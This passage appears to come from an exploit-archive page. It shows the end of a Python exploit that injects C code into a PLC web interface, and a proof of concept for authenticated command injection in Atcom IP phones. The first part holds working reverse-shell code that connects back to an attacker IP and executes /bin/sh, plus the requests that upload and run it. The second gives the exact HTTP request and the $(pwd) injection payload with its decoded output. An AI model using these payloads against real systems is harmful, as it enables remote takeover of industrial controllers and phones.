name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n \r\n \r\n \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n int port = "+rev_port+";\r\n struct sockaddr_in revsockaddr;\r\n\r\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n revsockaddr.sin_family = AF_INET; \r\n revsockaddr.sin_port = htons(port);\r\n revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n connect(sockt, (struct sockaddr *) &revsockaddr, \r\n sizeof(revsockaddr));\r\n dup2(sockt, 0);\r\n dup2(sockt, 1);\r\n dup2(sockt, 2);\r\n\r\n char * const argv[] = {\"/bin/sh\", NULL};\r\n execve(\"/bin/sh\", argv, NULL);\r\n\r\n return 0; \r\n \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"<br /> inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)<br /> time.sleep(3)<br /> # comp = x.get(compile_program)<br /> # time.sleep(6)<br /> # x.get(inject_dash)<br /> # time.sleep(3)<br /> # print('[+] Spawning Reverse Shell...')<br /> start = x.get(run_plc_server)<br /> time.sleep(1)<br /> if start.status_code == 200:<br /> print('[+] Reverse connection receveid!') <br /> sys.exit(0)<br /> else:<br /> print('[+] Failed to receive connection :(')<br /> sys.exit(0)<br /><br />auth()<br />injection()<br />connection()<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection<br /># Google Dork: N/A<br /># Date: 07/09/2023<br /># Exploit Author: Mohammed Adel<br /># Vendor Homepage: https://www.atcom.cn/<br /># Software Link:<br />https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html<br /># Version: All versions above 2.7.x.x<br /># Tested on: Kali Linux<br /><br /><br />Exploit Request:<br /><br />POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1<br />Host: {TARGET_IP}<br />User-Agent: polar<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Authorization: Digest username="admin", realm="IP Phone Web<br />Configuration", nonce="value_here",<br />uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",<br />response="value_here", qop=auth, nc=value_here, cnonce="value_here"<br /><br />cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping<br /><br /><br />Response:<br /><br />{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}<br /><br />The value of "ping_cmd_result" is encoded as base64. Decoding the<br />value of "ping_cmd_result" reveals the result of the command executed<br />as shown below:<br /><br />ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'<br /><br /></code></pre>